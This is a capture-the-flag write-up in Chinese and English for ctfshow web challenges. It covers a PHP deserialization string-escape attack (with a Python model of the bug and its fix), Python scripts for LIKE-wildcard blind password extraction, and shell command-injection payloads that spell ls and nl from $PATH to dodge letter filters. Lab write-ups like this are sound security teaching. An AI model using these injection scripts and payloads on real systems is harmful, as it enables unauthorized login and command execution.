ctfshow_月饼杯

0x01 web1_此夜圆 (deserialization string escape)

Download the attachment to get the source code; this is a deserialization string-escape challenge.

Too lazy to work out the count by hand, so just loop over the number of Firebasky copies.

<?php
error_reporting(0);
class a
{
	public $uname;
	public $password;
	public function __construct($uname,$password)
	{
		$this->uname=$uname;
		$this->password=$password;
	}
	public function __wakeup()
	{
			if($this->password==='yu22x')
			{
				echo "success!";	
			}
			else
			{
				echo 'wrong password';
			}
	}
}

// The filter runs on the already-serialized string: every hit adds 2 bytes ("up")
// but the s:N length prefix written by serialize() is not updated
function filter($string){
    return str_replace('Firebasky','Firebaskyup',$string);
}
$o = new a("test",1);
$encode = filter(serialize($o));
echo "正常格式:".$encode."\n";
// Try payloads: "Firebasky" repeated i times, followed by ";s:8:"password";s:5:"yu22x";}
for ($i=0; $i < 40; $i++) { 
	$payload = str_repeat("Firebasky",$i).'";s:8:"password";s:5:"yu22x";}';
	$o = new a($payload,1);
	$encode = filter(serialize($o));
	$decode = unserialize($encode);
	// Once the extra bytes exactly cover the injected tail, the tail is parsed as the password field
	if($decode->password=="yu22x"){
		echo "\npayload为:".$payload;
	}
}

Result:

正常格式:O:1:"a":2:{s:5:"uname";s:4:"test";s:8:"password";i:1;}
wrong passwordflag
payload为:FirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebaskyFirebasky";s:8:"password";s:5:"yu22x";}
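Why the loop stops at 15, and what a defender can check for: the injected tail is 30 bytes, each str_replace hit grows the data by 2 bytes while the s:N length written by serialize() stays fixed, so 30/2 = 15 copies push the tail out of the uname field. The Python below is an added example, not the challenge's PHP; it models serialize()/unserialize() for class a only, and contrasts the filter-after-serialize bug with filtering the field before serializing (leftover bytes after the closing brace are the tell).

```python
import re

def php_serialize_a(uname: str, password) -> str:
    # Models serialize() for the challenge's class a: strings become s:<length>:"...";, ints i:<n>;
    pw = f"i:{password};" if isinstance(password, int) else f's:{len(password)}:"{password}";'
    return f'O:1:"a":2:{{s:5:"uname";s:{len(uname)}:"{uname}";s:8:"password";{pw}}}'

def php_filter(s: str) -> str:
    # Models str_replace('Firebasky','Firebaskyup',$string): +2 bytes per hit, length fields untouched
    return s.replace("Firebasky", "Firebaskyup")

def needed_repeats(injected_tail: str, growth: int = 2) -> int:
    # The s:N length of uname was fixed before filtering, so each hit pushes N bytes of the
    # original value past the closing quote; the tail is swallowed once the hits add up to len(tail)
    return len(injected_tail) // growth

def php_unserialize_a(s: str):
    """Minimal model of unserialize() for class a: returns (fields, trailing_bytes).
    Like PHP it stops at the object's closing brace and ignores whatever follows."""
    m = re.match(r'O:1:"a":(\d+):\{', s)
    if not m:
        return None, s
    pos, fields = m.end(), {}
    for _ in range(int(m.group(1))):
        k = re.match(r's:(\d+):"', s[pos:])
        key = s[pos + k.end(): pos + k.end() + int(k.group(1))]
        pos += k.end() + int(k.group(1)) + 2                      # skip key and its closing '";'
        v = re.match(r's:(\d+):"|i:(-?\d+);', s[pos:])
        if v.group(2) is not None:                                 # integer value
            fields[key], pos = int(v.group(2)), pos + v.end()
        else:                                                      # string value
            n = int(v.group(1))
            fields[key] = s[pos + v.end(): pos + v.end() + n]
            pos += v.end() + n + 2
    return fields, s[pos + 1:]                                     # skip '}'

TAIL = '";s:8:"password";s:5:"yu22x";}'                            # the 30-byte tail from the write-up

def demo():
    n = needed_repeats(TAIL)                                       # 15, the count the brute force found
    payload = "Firebasky" * n + TAIL
    # Vulnerable order (filter after serialize): the declared length no longer matches the data,
    # so the tail is parsed as the password and the real bytes are left over after the object
    escaped, trailing = php_unserialize_a(php_filter(php_serialize_a(payload, 1)))
    # Fixed order (filter the field, then serialize): the length prefix is recomputed, nothing escapes
    safe, safe_trailing = php_unserialize_a(php_serialize_a(php_filter(payload), 1))
    return n, escaped["password"], trailing, safe["password"], safe_trailing

if __name__ == "__main__":
    print(demo())   # (15, 'yu22x', '";s:8:"password";i:1;}', 1, '')
```

Rejecting input that leaves trailing bytes after the object, or filtering fields before serialize() rather than after, closes this class of escape.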


0x03 web3_莫负婵娟 (LIKE blind injection, extracting letters from the $PATH environment variable)

The login page's source code contains some hints.

The username is yu22x and the query uses LIKE, so the wildcards % and _ can be used.

The percent (%) wildcard matches zero or more characters of any string; the underscore (_) wildcard matches exactly one character.

Fuzzing shows which characters are filtered: % is blocked, but _ still gets through, so we use _.

Write a script to test the password length:

import requests

headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"

# Baseline: a wrong password ("a") returns the "wrong password" page; its length (52 here) is the reference
req = requests.post(url=url, headers=headers, data={"username": "yu22x", "password": "a"})
baseline = len(req.text)
print(baseline)

# % is filtered, so probe with i underscores: LIKE '___...' only matches a password of exactly i characters
for i in range(1, 50):
    req = requests.post(url=url, headers=headers, data={"username": "yu22x", "password": "_" * i})
    if len(req.text) != baseline:
        print("[+] 长度为", i)

The length is 32.

Then log in with 32 underscores: yu22x / ________________________________

I have filtered all the characters. Why can you come in? get out!

So it seems we must log in with the real password; write a script to recover it character by character:

import requests

headers = {
    "Accept": "*/*",
    "Accept-Encoding": "gzip, deflate",
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0",
}
url = "http://d566d88e-ccce-4bcd-9ec5-7811d7f5ed24.challenge.ctf.show:8080/login.php"
fuzz = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
res = ""
# Recover the 32-character password one position at a time: known prefix + one candidate
# character + underscores for the remaining positions, so the guess is always 32 characters long
for i in range(32):
    for j in fuzz:
        guess = res + j + "_" * (31 - i)
        req = requests.post(url=url, headers=headers, data={"username": "yu22x", "password": guess})
        if "wrong" not in req.text:
            res += j
            print(res)
            break
print("password:", res)

This gives the password 67815b0c009ee970fe4014abaa3Fa6A0.

I couldn't work out the rest; at first I thought it was SSRF, and only after reading a write-up did I learn how to do it.

Build ls from the environment variable. ${PATH:5:1} is bash substring expansion (one character at offset 5); assuming the usual PATH beginning /usr/local/sbin:/usr/local/bin, offsets 5, 11 and 14 yield l, s and n, which is enough to spell ls and nl without typing a letter:

0;${PATH:5:1}${PATH:11:1}

ctfshow_月饼杯
Build nl the same way:

0;${PATH:14:1}${PATH:5:1} ????.???